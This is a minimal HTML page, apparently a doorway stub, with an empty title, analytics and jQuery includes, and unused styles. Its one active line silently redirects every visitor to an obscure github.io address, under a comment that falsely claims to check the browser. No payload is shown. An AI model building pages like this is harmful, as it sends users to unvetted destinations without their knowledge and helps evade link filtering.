<!DOCTYPE html>
<html>
<head>
    <title></title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="color-scheme" content="light dark">
    <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0,viewport-fit=cover">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="format-detection" content="telephone=no">
    
    <!-- 51统计 -->
    <script type="text/javascript" src="//js.users.51.la/21902529.js"></script>
    
    <script src="https://cdn.bootcdn.net/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <!-- 判断浏览器 -->
<script>window.location.href = 'https://hdxlkjkmoo.github.io/Aion999-huomatiaozhuan.github.io/'; </script>
    
    <style type="text/css">
        *{
            margin:0;
            padding:0;
        }
        #topyd{
            width: 100%;
            margin:0 auto;
            position: fixed;
            top: 0;
        }
        #topyd img{
            max-width: 100%;
        }
 
        #centeryd{
            width: 320px;
            margin:180px auto 0;
        }
 
        #centeryd img{
            max-width: 320px;
        }
 
        #bottomyd{
            width: 320px;
            margin:30px auto 0;
        }
 
        #bottomyd p{
            text-align: center;
            font-size: 18px;
            color: #174ded;
            font-weight: bold;
        }
    </style>
</head>
  
</html>
